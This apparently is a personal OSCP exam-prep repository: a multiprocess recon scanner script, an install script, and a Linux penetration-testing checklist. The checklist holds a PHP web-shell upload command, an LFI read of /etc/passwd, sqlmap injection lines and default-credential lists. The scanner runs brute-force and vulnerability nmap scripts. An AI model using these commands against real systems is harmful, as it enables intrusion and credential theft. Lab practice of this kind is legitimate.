[
  {
    "path": "README.md",
    "content": "# oscp\n\n## Reconscan.py\n\nThis script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once.\n\nThe script is invoked like this:\n\n```\npython reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103\n```\n\nOne important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports.\n\nPlease note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.\n\n## Templates\n\nI created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.  \n\nThe templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files.\n\nThe templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. 
And nikto-scan.\n\nWherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/\n"
  },
  {
    "path": "recon_enum/reconscan.py",
    "content": "#!/usr/bin/env python\nimport subprocess\nimport multiprocessing\nfrom multiprocessing import Process, Queue\nimport os\nimport time\nimport fileinput\nimport atexit\nimport sys\nimport socket\nimport re\n\n# Todo:\n# Add mysql nmap-script\n# Change replace to sed:\n# sed 's|literal_pattern|replacement_string|g'\n\nstart = time.time()\n\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n\n# Creates a function for multiprocessing. Several things at once.\ndef multProc(targetin, scanip, port):\n    jobs = []\n    p = multiprocessing.Process(target=targetin, args=(scanip,port))\n    jobs.append(p)\n    p.start()\n    return\n\ndef connect_to_port(ip_address, port, service):\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((ip_address, int(port)))\n    banner = s.recv(1024)\n\n    if service == \"ftp\":\n        s.send(\"USER anonymous\\r\\n\")\n        user = s.recv(1024)\n        s.send(\"PASS anonymous\\r\\n\")\n        password = s.recv(1024)\n        total_communication = banner + \"\\r\\n\" + user + \"\\r\\n\" + password\n        write_to_file(ip_address, \"ftp-connect\", total_communication)\n    elif service == \"smtp\":\n        total_communication = banner + \"\\r\\n\"\n        write_to_file(ip_address, \"smtp-connect\", total_communication)\n    elif service == \"ssh\":\n        total_communication = banner\n        write_to_file(ip_address, \"ssh-connect\", total_communication)\n    elif service == \"pop3\":\n        s.send(\"USER root\\r\\n\")\n        user = s.recv(1024)\n        s.send(\"PASS root\\r\\n\")\n        password = s.recv(1024)\n        total_communication = banner +  user +  password\n        write_to_file(ip_address, \"pop3-connect\", total_communication)\n    s.close()\n\n\n\n\ndef write_to_file(ip_address, enum_type, data):\n\n  
  file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)\n    file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)\n    paths = [file_path_linux, file_path_windows]\n    print bcolors.OKGREEN + \"INFO: Writing \" + enum_type + \" to template files:\\n \" + file_path_linux + \"   \\n\" + file_path_windows + bcolors.ENDC\n\n    for path in paths:\n        if enum_type == \"portscan\":\n            subprocess.check_output(\"replace INSERTTCPSCAN \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"dirb\":\n            subprocess.check_output(\"replace INSERTDIRBSCAN \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"nikto\":\n            subprocess.check_output(\"replace INSERTNIKTOSCAN \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"ftp-connect\":\n            subprocess.check_output(\"replace INSERTFTPTEST \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"smtp-connect\":\n            subprocess.check_output(\"replace INSERTSMTPCONNECT \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"ssh-connect\":\n            subprocess.check_output(\"replace INSERTSSHCONNECT \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"pop3-connect\":\n            subprocess.check_output(\"replace INSERTPOP3CONNECT \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n        if enum_type == \"curl\":\n            subprocess.check_output(\"replace INSERTCURLHEADER \\\"\" + data + \"\\\"  -- \" + path, shell=True)\n    return\n\n\n\ndef dirb(ip_address, port, url_start, wordlist=\"/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt\"):\n    print bcolors.HEADER + \"INFO: Starting dirb scan for \" + ip_address + bcolors.ENDC\n    DIRBSCAN = \"dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r\" % (url_start, ip_address, port, ip_address, ip_address, wordlist)\n    print bcolors.HEADER + 
DIRBSCAN + bcolors.ENDC\n    results_dirb = subprocess.check_output(DIRBSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with dirb scan for \" + ip_address + bcolors.ENDC\n    print results_dirb\n    write_to_file(ip_address, \"dirb\", results_dirb)\n    return\n\ndef nikto(ip_address, port, url_start):\n    print bcolors.HEADER + \"INFO: Starting nikto scan for \" + ip_address + bcolors.ENDC\n    NIKTOSCAN = \"nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt\" % (url_start, ip_address, ip_address, url_start, ip_address)\n    print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC\n    results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with NIKTO-scan for \" + ip_address + bcolors.ENDC\n    print results_nikto\n    write_to_file(ip_address, \"nikto\", results_nikto)\n    return\n\n\ndef httpEnum(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected http on \" + ip_address + \":\" + port + bcolors.ENDC\n    print bcolors.HEADER + \"INFO: Performing nmap web script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n\n    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,\"http\"))\n    dirb_process.start()\n    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,\"http\"))\n    nikto_process.start()\n\n    CURLSCAN = \"curl -I http://%s\" % (ip_address)\n    print bcolors.HEADER + CURLSCAN + bcolors.END\n    curl_results = subprocess.check_output(CURLSCAN, shell=True)\n    write_to_file(ip_address, \"curl\", curl_results)\n    HTTPSCAN = \"nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN 
../reports/%s/%s_http.nmap %s\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + HTTPSCAN + bcolors.ENDC\n\n    http_results = subprocess.check_output(HTTPSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with HTTP-SCAN for \" + ip_address + bcolors.ENDC\n    print http_results\n\n    return\n\ndef httpsEnum(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected https on \" + ip_address + \":\" + port + bcolors.ENDC\n    print bcolors.HEADER + \"INFO: Performing nmap web script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n\n    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,\"https\"))\n    dirb_process.start()\n    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,\"https\"))\n    nikto_process.start()\n\n    SSLSCAN = \"sslscan %s:%s >> ../reports/%s/ssl_scan_%s\" % (ip_address, port, ip_address, ip_address)\n    print bcolors.HEADER + SSLSCAN + bcolors.ENDC\n    ssl_results = subprocess.check_output(SSLSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: CHECK FILE - Finished with SSLSCAN for \" + ip_address + bcolors.ENDC\n\n    HTTPSCANS = \"nmap -sV -Pn  -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + HTTPSCANS + bcolors.ENDC\n    https_results = subprocess.check_output(HTTPSCANS, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with HTTPS-scan for \" + ip_address + bcolors.ENDC\n    print https_results\n    return\n\ndef mssqlEnum(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected MS-SQL on \" + 
ip_address + \":\" + port + bcolors.ENDC\n    print bcolors.HEADER + \"INFO: Performing nmap mssql script scan for \" + ip_address + \":\" + port + bcolors.ENDC\n    MSSQLSCAN = \"nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s\" % (port, ip_address, ip_address)\n    print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC\n    mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with MSSQL-scan for \" + ip_address + bcolors.ENDC\n    print mssql_results\n    return\n\n\ndef smtpEnum(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected smtp on \" + ip_address + \":\" + port  + bcolors.ENDC\n    connect_to_port(ip_address, port, \"smtp\")\n    SMTPSCAN = \"nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + SMTPSCAN + bcolors.ENDC\n    smtp_results = subprocess.check_output(SMTPSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SMTP-scan for \" + ip_address + bcolors.ENDC\n    print smtp_results\n    # write_to_file(ip_address, \"smtp\", smtp_results)\n    return\n\ndef smbNmap(ip_address, port):\n    print \"INFO: Detected SMB on \" + ip_address + \":\" + port\n    smbNmap = \"nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap\" % (ip_address, ip_address, ip_address)\n    smbNmap_results = subprocess.check_output(smbNmap, shell=True)\n    print 
bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SMB-Nmap-scan for \" + ip_address + bcolors.ENDC\n    print smbNmap_results\n    return\n\ndef smbEnum(ip_address, port):\n    print \"INFO: Detected SMB on \" + ip_address + \":\" + port\n    enum4linux = \"enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null\" % (ip_address, ip_address, ip_address)\n    enum4linux_results = subprocess.check_output(enum4linux, shell=True)\n    print bcolors.OKGREEN + \"INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for \" + ip_address + bcolors.ENDC\n    print enum4linux_results\n    return\n\ndef ftpEnum(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected ftp on \" + ip_address + \":\" + port  + bcolors.ENDC\n    connect_to_port(ip_address, port, \"ftp\")\n    FTPSCAN = \"nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + FTPSCAN + bcolors.ENDC\n    results_ftp = subprocess.check_output(FTPSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with FTP-Nmap-scan for \" + ip_address + bcolors.ENDC\n    print results_ftp\n    return\n\ndef udpScan(ip_address):\n    print bcolors.HEADER + \"INFO: Detected UDP on \" + ip_address + bcolors.ENDC\n    UDPSCAN = \"nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s\"  % (ip_address, ip_address, ip_address)\n    print bcolors.HEADER + UDPSCAN + bcolors.ENDC\n    udpscan_results = subprocess.check_output(UDPSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with UDP-Nmap scan for \" + ip_address + bcolors.ENDC\n    print udpscan_results\n    UNICORNSCAN = \"unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt\" % (ip_address, ip_address, ip_address)\n    unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True)\n    print bcolors.OKGREEN + 
\"INFO: CHECK FILE - Finished with UNICORNSCAN for \" + ip_address + bcolors.ENDC\n\ndef sshScan(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected SSH on \" + ip_address + \":\" + port  + bcolors.ENDC\n    connect_to_port(ip_address, port, \"ssh\")\n    SSHSCAN = \"nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + SSHSCAN + bcolors.ENDC\n    results_ssh = subprocess.check_output(SSHSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with SSH-Nmap-scan for \" + ip_address + bcolors.ENDC\n    print results_ssh\n    return\n\ndef pop3Scan(ip_address, port):\n    print bcolors.HEADER + \"INFO: Detected POP3 on \" + ip_address + \":\" + port  + bcolors.ENDC\n    connect_to_port(ip_address, port, \"pop3\")\n    POP3SCAN = \"nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s\" % (port, ip_address, ip_address, ip_address)\n    print bcolors.HEADER + SSHSCAN + bcolors.ENDC\n    results_pop3 = subprocess.check_output(POP3SCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with POP3-Nmap-scan for \" + ip_address + bcolors.ENDC\n    print results_pop3\n    return\n\n\ndef nmapScan(ip_address):\n    ip_address = ip_address.strip()\n    print bcolors.OKGREEN + \"INFO: Running general TCP/UDP nmap scans for \" + ip_address + bcolors.ENDC\n\n\n    TCPSCAN = \"nmap -sV -O %s -oN '../reports/%s/%s.nmap'\"  % (ip_address, ip_address, ip_address)\n    print bcolors.HEADER + TCPSCAN + bcolors.ENDC\n    results = subprocess.check_output(TCPSCAN, shell=True)\n    print bcolors.OKGREEN + \"INFO: RESULT BELOW - Finished with BASIC Nmap-scan for \" + ip_address + bcolors.ENDC\n    print results\n\n    p = multiprocessing.Process(target=udpScan, args=(scanip,))\n    p.start()\n\n    write_to_file(ip_address, \"portscan\", results)\n    
lines = results.split(\"\\n\")\n    serv_dict = {}\n    for line in lines:\n        ports = []\n        line = line.strip()\n        if (\"tcp\" in line) and (\"open\" in line) and not (\"Discovered\" in line):\n            # print line\n            while \"  \" in line:\n                line = line.replace(\"  \", \" \");\n            linesplit= line.split(\" \")\n            service = linesplit[2] # grab the service name\n\n            port = line.split(\" \")[0] # grab the port/proto\n            # print port\n            if service in serv_dict:\n                ports = serv_dict[service] # if the service is already in the dict, grab the port list\n\n            ports.append(port)\n            # print ports\n            serv_dict[service] = ports # add service to the dictionary along with the associated port(2)\n\n\n\n   # go through the service dictionary to call additional targeted enumeration functions\n    for serv in serv_dict:\n        ports = serv_dict[serv]\n        if re.search(r\"http[^s]\", serv):\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(httpEnum, ip_address, port)\n        elif re.search(r\"https|ssl\", serv):\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(httpsEnum, ip_address, port)\n        elif \"smtp\" in serv:\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(smtpEnum, ip_address, port)\n        elif \"ftp\" in serv:\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(ftpEnum, ip_address, port)\n        elif (\"microsoft-ds\" in serv) or (\"netbios-ssn\" == serv):\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(smbEnum, ip_address, port)\n                multProc(smbNmap, ip_address, port)\n        elif \"ms-sql\" in serv:\n            for port in ports:\n                
port = port.split(\"/\")[0]\n                multProc(mssqlEnum, ip_address, port)\n        elif \"ssh\" in serv:\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(sshScan, ip_address, port)\n        elif \"snmp\" in serv:\n            for port in ports:\n                port = port.split(\"/\")[0]\n                multProc(snmpEnum, ip_address, port)\n\n    return\n\n\nprint bcolors.HEADER\nprint \"------------------------------------------------------------\"\nprint \"!!!!                      RECON SCAN                   !!!!!\"\nprint \"!!!!            A multi-process service scanner        !!!!!\"\nprint \"!!!!        dirb, nikto, ftp, ssh, mssql, pop3, tcp    !!!!!\"\nprint \"!!!!                    udp, smtp, smb                 !!!!!\"\nprint \"------------------------------------------------------------\"\n\n\n\nif len(sys.argv) < 2:\n    print \"\"\n    print \"Usage: python reconscan.py <ip> <ip> <ip>\"\n    print \"Example: python reconscan.py 192.168.1.101 192.168.1.102\"\n    print \"\"\n    print \"############################################################\"\n    pass\n    sys.exit()\n\nprint bcolors.ENDC\n\nif __name__=='__main__':\n\n    # Setting ip targets\n    targets = sys.argv\n    targets.pop(0)\n\n    dirs = os.listdir(\"../reports/\")\n    for scanip in targets:\n        scanip = scanip.rstrip()\n        if not scanip in dirs:\n            print bcolors.HEADER + \"INFO: No folder was found for \" + scanip + \". 
Setting up folder.\" + bcolors.ENDC\n            subprocess.check_output(\"mkdir ../reports/\" + scanip, shell=True)\n            subprocess.check_output(\"mkdir ../reports/\" + scanip + \"/exploits\", shell=True)\n            subprocess.check_output(\"mkdir ../reports/\" + scanip + \"/privesc\", shell=True)\n            print bcolors.OKGREEN + \"INFO: Folder created here: \" + \"../reports/\" + scanip + bcolors.ENDC\n            subprocess.check_output(\"cp ../templates/windows-template.md ../reports/\" + scanip + \"/mapping-windows.md\", shell=True)\n            subprocess.check_output(\"cp ../templates/linux-template.md ../reports/\" + scanip + \"/mapping-linux.md\", shell=True)\n            print bcolors.OKGREEN + \"INFO: Added pentesting templates: \" + \"../reports/\" + scanip + bcolors.ENDC\n            subprocess.check_output(\"sed -i -e 's/INSERTIPADDRESS/\" + scanip + \"/g' ../reports/\" + scanip + \"/mapping-windows.md\", shell=True)\n            subprocess.check_output(\"sed -i -e 's/INSERTIPADDRESS/\" + scanip + \"/g' ../reports/\" + scanip + \"/mapping-linux.md\", shell=True)\n\n\n\n        p = multiprocessing.Process(target=nmapScan, args=(scanip,))\n        p.start()\n"
  },
  {
    "path": "reports/reports.txt",
    "content": ""
  },
  {
    "path": "setup.sh",
    "content": "#!/bin/bash\n\nfolder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)\necho -e '#!/bin/bash\\n' > /usr/bin/reconscan\necho -e \"cd  $folder && python reconscan.py \\\"\\$@\\\" \\n\" >> /usr/bin/reconscan\nchmod +x /usr/bin/reconscan\n\n"
  },
  {
    "path": "templates/linux-template.md",
    "content": "## Info-sheet\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Kernel:\n- Workgroup:\n- Windows domain:\n\nServices and ports:\nINSERTTCPSCAN\n\n## Recon\n\n\n```\nAlways start with a stealthy scan to avoid closing ports.\n\n# Syn-scan\nnmap -sS INSERTIPADDRESS\n\n# Scan all ports, might take a while.\nnmap INSERTIPADDRESS -p-\n\n# Service-version, default scripts, OS:\nnmap INSERTIPADDRESS -sV -sC -O -p 111,222,333\n\n# Scan for UDP\nnmap INSERTIPADDRESS -sU\nunicornscan -mU -v -I INSERTIPADDRESS\n\n# Connect to udp if one is open\nnc -u INSERTIPADDRESS 48772\n\n# Monster scan\nnmap INSERTIPADDRESS -p- -A -T4 -sC\n```\n\n\n### Port 21 - FTP\n\n- FTP-Name:\n- FTP-version:\n- Anonymous login:\n\nINSERTFTPTEST\n\n\n```\nnmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS\n```\n\n### Port 22 - SSH\n\n- Name:\n- Version:\n- Takes-password:\n- If you have usernames test login with username:username\n\nINSERTSSHCONNECT\n\n```\nnc INSERTIPADDRESS 22\n```\n\n### Port 25\n\n- Name:\n- Version:\n- VRFY:\n\nINSERTSMTPCONNECT\n\n\n```\nnc -nvv INSERTIPADDRESS 25\nHELO foo<cr><lf>\n\ntelnet INSERTIPADDRESS 25\nVRFY root\n\nnmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS\n```\n\n### Port 69 - UDP - TFTP\n\nThis is used for tftp-server.\n\n\n### Port 110 - Pop3\n\n- Name:\n- Version:\n\nINSERTPOP3CONNECT\n\n```\ntelnet INSERTIPADDRESS 110\nUSER pelle@INSERTIPADDRESS\nPASS admin\n\nor:\n\nUSER pelle\nPASS admin\n\n# List all emails\nlist\n\n# Retrieve email number 5, for example\nretr 9\n```\n\n### Port 111 - Rpcbind\n\n```\nrpcinfo -p INSERTIPADDRESS\n```\n\n\n### Port 135 - MSRPC\n\nSome versions are vulnerable.\n\n### Port 143 - Imap\n\n### Port 139/445 - SMB\n\n- Name:\n- Version:\n- Domain/workgroup name:\n- Domain-sid:\n- Allows unauthenticated login:\n\n\n```\nnmap 
--script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445\n\n\nenum4linux -a INSERTIPADDRESS\nrpcclient -U \"\" INSERTIPADDRESS\n\tsrvinfo\n\tenumdomusers\n\tgetdompwinfo\n\tquerydominfo\n\tnetshareenum\n\tnetshareenumall\n\nsmbclient -L INSERTIPADDRESS\nsmbclient //INSERTIPADDRESS/tmp\nsmbclient \\\\\\\\INSERTIPADDRESS\\\\ipc$ -U john\nsmbclient //INSERTIPADDRESS/ipc$ -U john  \n```\n\n\n### Port 161/162 UDP - SNMP\n\n```\nnmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS\nsnmp-check -t INSERTIPADDRESS -c public\n```\n\n```\n# Common community strings\npublic\nprivate\ncommunity\n```\n\n\n### Port 554 - RTSP\n\n\n### Port 1030/1032/1033/1038\n\nUsed by RPC to connect in domain network.\n\n## Port 1521 - Oracle\n\n- Name:\n- Version:\n- Password protected:\n\n```\ntnscmd10g version -h INSERTIPADDRESS\ntnscmd10g status -h INSERTIPADDRESS\n```\n\n### Port 2049 - NFS\n\n```\nshowmount -e INSERTIPADDRESS\n\nIf you find anything you can mount it like this:\n\nmount INSERTIPADDRESS:/ /tmp/NFS\nmount -t INSERTIPADDRESS:/ /tmp/NFS\n```\n\n### Port 2100 - Oracle XML DB\n\n- Name:\n- Version:\n- Default logins:\n\n```\nsys:sys\nscott:tiger\n```\n\nDefault passwords\nhttps://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm\n\n\n### 3306 - MySQL\n\n- Name:\n- Version:\n\n```\nnmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306\n\nmysql --host=INSERTIPADDRESS -u root -p\n```\n\n### Port 3339 - Oracle web interface\n\n\n- Basic info about web service (apache, nginx, IIS)\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n\n### Port 80 - 
Web server\n\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n- Domain-name address:\n\n\nINSERTCURLHEADER\n\n- Web application (ex, wordpress, joomla, phpmyadmin)\n- Name:\n- Version:\n- Admin-login:\n\n\n```\n# Nikto\nnikto -h http://INSERTIPADDRESS\n\n# Nikto with squid proxy\nnikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444\n\n# CMS Explorer\ncms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]\n\n# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)\nwpscan --url http://INSERTIPADDRESS\nwpscan --url http://INSERTIPADDRESS --enumerate vp\nwpscan --url http://INSERTIPADDRESS --enumerate vt\nwpscan --url http://INSERTIPADDRESS --enumerate u\n\n# Joomscan\njoomscan -u  http://INSERTIPADDRESS \njoomscan -u  http://INSERTIPADDRESS --enumerate-components\n\n# Get header\ncurl -i INSERTIPADDRESS\n\n# Get everything\ncurl -i -L INSERTIPADDRESS\n\n# Check for title and all links\ncurl INSERTIPADDRESS -s -L | grep \"title\\|href\" | sed -e 's/^[[:space:]]*//'\n\n# Look at page with just text\ncurl INSERTIPADDRESS -s -L | html2text -width '99' | uniq\n\n# Check if it is possible to upload\ncurl -v -X OPTIONS http://INSERTIPADDRESS/\ncurl -v -X PUT -d '<?php system($_GET[\"cmd\"]); ?>' http://INSERTIPADDRESS/test/shell.php\n\ndotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix\n```\n\n#### Nikto scan\n\n\nINSERTNIKTOSCAN\n\n\n#### Url brute force\n\n```\n# Not recursive\ndirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt\n\n# Gobuster - remove relevant responde codes (403 for example)\ngobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e\n```\n\nINSERTDIRBSCAN\n\n\n#### Default/Weak login\n\nSearch documentation for default passwords and test them\n\n```\nsite:webapplication.com password\n```\n\n```\nadmin admin\nadmin password\nadmin <blank>\nadmin <servicename>\nroot root\nroot admin\nroot password\nroot 
<servicename>\n<username if you have> password\n<username if you have> admin\n<username if you have> username\nusername <servicename>\n```\n\n\n#### LFI/RFI\n\n\n\n\n```\nfimap -u \"http://INSERTIPADDRESS/example.php?test=\"\n\n# Ordered output\ncurl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd\n/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=\n```\n\n#### SQL-Injection\n\n```\n# Post\n./sqlmap.py -r search-test.txt -p tfUPass\n\n# Get\nsqlmap -u \"http://INSERTIPADDRESS/index.php?id=1\" --dbms=mysql\n\n# Crawl\nsqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3\n```\n\n#### Sql-login-bypass\n\n- Open Burp-suite\n- Make and intercept a request\n- Send to intruder\n- Cluster attack.\n- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)\n- Attack\n- Check for response length variation\n\n\n### Password brute force - last resort\n\n```\ncewl\n```\n\n### Port 443 - HTTPS\n\nHeartbleed:\n\n```\n# Heartbleed\nsslscan INSERTIPADDRESS:443\n```\n\n## Vulnerability analysis\n\nNow we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features.\n\n### To try - List of possibilies\nAdd possible exploits here:\n\n\n\n### Find sploits - Searchsploit and google\n\nWhere there are many exploits for a software, use google. 
It will automatically sort it by popularity.\n\n```\nsite:exploit-db.com apache 2.4.7\n\n# Remove dos-exploits\n\nsearchsploit Apache 2.4.7 | grep -v '/dos/'\nsearchsploit Apache | grep -v '/dos/' | grep -vi \"tomcat\"\n\n# Only search the title (exclude the path), add the -t\nsearchsploit -t Apache | grep -v '/dos/'\n```\n\n\n\n----------------------------------------------------------------------------\n\n\n\n'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''\n\n\n\n-----------------------------------------------------------------------------\n\n\n\n## Privilege escalation\n\nNow we start the whole enumeration-process over gain.\n\n- Kernel exploits\n- Programs running as root\n- Installed software\n- Weak/reused/plaintext passwords\n- Inside service\n- Suid misconfiguration\n- World writable scripts invoked by root\n- Unmounted filesystems\n\nLess likely\n\n- Private ssh keys\n- Bad path configuration\n- Cronjobs\n\n\n### To-try list\n\nHere you will add all possible leads. 
